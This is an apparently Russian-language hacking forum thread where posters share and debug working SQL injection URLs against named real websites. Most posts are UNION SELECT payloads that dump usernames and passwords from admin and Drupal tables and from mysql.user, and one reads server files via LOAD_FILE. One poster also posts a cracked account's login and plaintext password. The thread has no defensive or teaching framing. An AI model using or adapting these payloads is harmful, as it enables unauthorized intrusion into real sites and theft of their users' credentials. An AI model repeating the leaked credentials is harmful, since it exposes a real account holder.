не сказал бы что очень уж похоже не дес, и как понять что с форума ? походит на base64, а точнее на md5-base64 .. хотя не зватает 4х символов ..
http://juggling.tv Code: http://juggling.tv/vaults/uvideos.php?UID=-1+union+select+1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,20,21,2,3,4,5,6,7,8,9,30,31,2,3,4,5-- ____________________________________________ http://www.astafiev.ru Да, без вывода. ____________________________________________ http://www.fortwaynereader.com Тут, похоже, нужно указывать группировку по полю
Ага. http://www.legis.krsn.ru/ Code: http://www.legis.krsn.ru/lawsinfo.php?UID=-1+union+select+1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
Code: http://www.mymaika.ru/page.php?id=-120+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14-- подобрал, вроде 14. но ошибка в чем трабл?
В соседней темы выкладывалась скуля Почему при Вылазит ошибка Fatal error: Call to a member function recordcount() on a non-object in /home/yesoudo/www/channel_detail.php on line 14?? Пробовал переводить название таблицы в CHAR
потому что таблица находится в другой базе Code: http://www.yesoudo.com/channel_detail.php?chid=-15+union+select+1,concat_ws(0x3a3a,login,pass),3,4,5,6,7,8,9+from+garmenia.drupalusers-- Bonus доступ к mysql.user: Code: http://www.yesoudo.com/channel_detail.php?chid=-15+union+select+1,concat(user,0x3a,password,0x3a,host,0x3a,file_priv),3,4,5,6,7,8,9+from+mysql.user-- чтение фалов: Code: http://www.yesoudo.com/channel_detail.php?chid=-15+union+select+1,LOAD_FILE(CHAR(47,104,111,109,101,47,121,101,115,111,117,100,111,47,119,119,119,47,99,104,97,110,110,101,108,95,100,101,116,97,105,108,46,112,104,112)),3,4,5,6,7,8,9--
Подскажите, что за косяк: Скуля 4-ка: http://www.site.com/amino.php?id=-56+union+select+1,2,3,4,5,6,7,8,9,10,concat(username,0x3a,password),12,13,14+from+adminrights limit 0,1-- Перебираю лимитом: 0,1 - выводит - все ОК., ввожу 1,1 - выскакивает ошибка: "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY iorder ASC' at line 1" Что делаю не так?
расшифровал хеш юзера, но почему то не заходит в аккаунт... ( login 1225532271 pass arnaud2007 name michamk Странно..
2 Octave_Parango: проверь так: http://www.site.com/amino.php?id=-56+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(username,0x3a,password),12,13,14+from+adminrights--